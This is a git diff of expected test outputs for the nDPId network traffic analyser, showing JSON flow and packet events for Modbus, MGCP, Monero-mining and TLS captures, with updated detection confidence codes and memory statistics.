00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"mgcp.pcapng","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":1160,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1463066856144} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869791 bytes -~~ total memory freed........: 5869791 bytes -~~ total allocations/frees...: 118126/118126 +~~ total memory allocated....: 6003425 bytes +~~ total memory freed........: 6003425 bytes +~~ total allocations/frees...: 120888/120888 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 455 chars ~~ json string max len.......: 680 chars diff --git a/test/results/modbus.pcap.out b/test/results/modbus.pcap.out index 93c7a4d58..ac75a6472 100644 --- a/test/results/modbus.pcap.out +++ b/test/results/modbus.pcap.out 
@@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1223541953927} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1223541953927,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953927,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/1AAIAGEGjAqG6DwKhuiggaAfZB0urG4RU6zlAY\/MYAMgAAANEAAAAGAQMAAQAB"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1223541953929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1223541953929,"pkt":"AArkxYMKABzAX0kKCABFAAAzO9pAAIAGYIzAqG6KwKhugwH2CBrhFTrOQdLq0lAY++v\/BAAAANEAAAAFAQMCAAA="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1223541953929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953929,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/5AAIAGEGfAqG6DwKhuiggaAfZB0urS4RU62VAY\/LsAJgAAANIAAAAGAQMAAAAB"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7580000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7580000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} 
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":102,"packets-processed":102,"total-skipped-flows":0,"total-l4-payload-len":1173,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1223541977037} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 102/102 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872401 bytes -~~ total memory freed........: 5872401 bytes -~~ total allocations/frees...: 118216/118216 +~~ total memory allocated....: 6006035 bytes +~~ total memory freed........: 6006035 bytes +~~ total allocations/frees...: 120978/120978 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 695 chars diff --git a/test/results/monero.pcap.out b/test/results/monero.pcap.out index f227900b7..4f9408496 100644 --- a/test/results/monero.pcap.out +++ b/test/results/monero.pcap.out 
@@ -4,15 +4,15 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196188350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188350,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8e7pAAEAG1e7AqAKUXhfHv7b2DQVL2\/baAAAAAKACchDZewAAAgQFtAQCCAocofANAAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196188430,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188430,"pkt":"cIXCQ0+ifmgbW\/gUCABF4AA8AABAADEGX8leF8e\/wKgClA0FtvbB2Ar1S9v226AScSCYUwAAAgQFtAQCCArnhI20HKHwDQEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196188430,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196188430,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA0e7tAAEAG1fXAqAKUXhfHv7b2DQVL2\/bbwdgK9oAQAOU3CgAAAQEIChyh8F7nhI20"} 
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196196437,"flow_last_seen":1514196196437,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196196437,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1514196196437,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196196437,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8ltZAAEAGxBLAqAKUdNOnw9JWDQXzKAOTAAAAAKACchCvSQAAAgQFtAQCCAqVhds1AAAAAAEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1514196196745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196196745,"pkt":"cIXCQ0+ifmgbW\/gUCABFAAA0AABAACEGefF006fDwKgClA0F0lYVgl9O8ygDlIASchDSRAAAAgQFpAEBBAIBAwMH"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1514196196745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1514196196745,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAAoltdAAEAGxCXAqAKUdNOnw9JWDQXzKAOUFYJfT1AQAOWEMgAA"} 
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":199,"source":"monero.pcap","alias":"nDPId-test","packets-captured":199,"packets-processed":198,"total-skipped-flows":0,"total-l4-payload-len":82647,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1514196819733} -00920{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00921{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00920{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00921{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","packets-captured":319,"packets-processed":319,"total-skipped-flows":0,"total-l4-payload-len":146090,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1514197279769} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 319/319 
@@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5892058 bytes -~~ total memory freed........: 5892058 bytes -~~ total allocations/frees...: 118441/118441 +~~ total memory allocated....: 6025692 bytes +~~ total memory freed........: 6025692 bytes +~~ total allocations/frees...: 121203/121203 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 454 chars ~~ json string max len.......: 926 chars diff --git a/test/results/mongo_false_positive.pcapng.out b/test/results/mongo_false_positive.pcapng.out new file mode 100644 index 000000000..8442aff4d --- /dev/null +++ b/test/results/mongo_false_positive.pcapng.out 
@@ -0,0 +1,24 @@ +00473{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593581341477} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593581341477,"flow_last_seen":1593581341477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1593581341477,"l3_proto":"ip4","src_ip":"188.75.184.20","dst_ip":"251.182.120.32","src_port":49542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593581341477,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593581341477,"pkt":"AAAAAAAAAAUAoyAkCABFAAA0JV9AAH8G7i28S7gU+7Z4IMGGAbvEY9K7AAAAAIACIAAM3AAAAgQFUAEDAwgBAQQC"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593581341641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593581341641,"pkt":"AAAAAAAAAAUAoyAkCABFAAA0AABAADIGYI37tnggvEu4FAG7wYZmWxUYxGPSvIAS\/\/+x9gAAAgQFtAEDAwYEAgAA"} +01739{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593581341663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":992,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":992,"pkt_l4_len":958,"thread_ts_msec":1593581341663,"pkt":"AAAAAAAAAAUAoyAkCABFAAPSJW1AAH8G6oG8S7gU+7Z4IMGGAbvEY9K8ZlsVGVAYAQRawwAAS0UAAAIGAVUAAAOeAQAAAI\/gqM9rhiEBAKoEmsOFlYhbJuU1bIo9gZTyPfuzEe6Bp0R1dekdpTM6J+UvhI\/atZONAg8NzlQZtu5ojbPV8zngZbQ4cMrOmnpw9tHIlOI54G8PoCZSSkCzTgVCUZhK6MJ5bEMhaGP8N7VRdGYUxlP3dzaquR9vVcn2XCbu1OyYr2d0f1ttQ9h3X1YHOEON1NdSoBGgqAG\/RHZ07sPa05Xl0UfvrDoaVlD5IET07FH8mSieF7FGedhv4Dj8+Qs2QRqvK1LVJAdhq+ZWqlrhFkDX0yKJTUfo3bbGz2SIZ\/XxVlL4engJDsc82rBIbEtS9RD4G6zaTKjota10U5LlxsWBv\/vF+LDG\/paIKhaHvmX8vMxet\/aPzSosJEi+YbJFZl+ktaTyXfc\/YvBACPyzDXq8dhIQ5EVoVoDF057eylaAp\/b4N7xUz0eIEWtWnaB0pI5aDo4niooDJSg17oEyP4wyEr\/dvj3gCHS3NSaxT2sQF2oI3lWoPKrC0p0TgCGwyk+8uc881xFgiaBcY
R1Yq0b8s5nkKulFLZbepk3ixzHUGR38KIk34A5MFpTd4KumfzcRxc7\/mX4meETJikfhTvukqtqy2IYPW1+bRCNngFny3xkNjuE8UTx9apsSVjAbTJF+iDOEmtnFO33Z6kd1hnlmj+tmLxBU2U+7\/2yY34wwJqnOK7DcIcn8VN01WW8pn3XVPTYJNsveJbYtzxAN0QGn6elB1t+tkYz2AI\/bDfCljfqPz9Jhedr6TYt68rJMKvcBzN3Q0kn+ZV6lGIlXIjJihQ4kCBOwQwip+5E7YbzQz0\/EXg8j8I3XpkGddnOHbFEF94xKqghkO3CAwEE6UQtp7apLsuQt7+mbJJz9gWE69awD9rmmPEWE8YlOUDLu1N4GbHa5imN9wzwYR+eX3QagWTsU5MR8LmGzgISvHibhJ5ezVRBpd3CUbMW90\/iKKi474G30KMqYY2leCU0\/tizO+qE1KfBV3hd9rhEf7YOvS85zKOwuFIMuX\/INA9ydr5yFK2w5YCPYbOJJfQroAzWeXjFmHC\/dRCEeIjKkt28uWt0ZvpMtgYBxAWF\/Vuz\/pDAkp0VgXkELtbg760cvqlW4RdFlUHBSj6byX+5rUcEhuxN1Rj5iZNMiLbXNeywFcEIx0wl1FUA9pdx9eiII4CqBL1rzogzCSax9kM\/yFoBDH7LcCWZjzM+PnYkYE5zQ0GRHMuFNnbkl4+w="} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1593581341477,"flow_last_seen":1593581425923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1274,"flow_tot_l4_payload_len":10731,"flow_avg_l4_payload_len":412,"midstream":0,"thread_ts_msec":1593581425923,"l3_proto":"ip4","src_ip":"188.75.184.20","dst_ip":"251.182.120.32","src_port":49542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00603{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1593581341477,"flow_last_seen":1593581425923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1274,"flow_tot_l4_payload_len":10731,"flow_avg_l4_payload_len":412,"midstream":0,"thread_ts_msec":1593581425923,"l3_proto":"ip4","src_ip":"188.75.184.20","dst_ip":"251.182.120.32","src_port":49542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
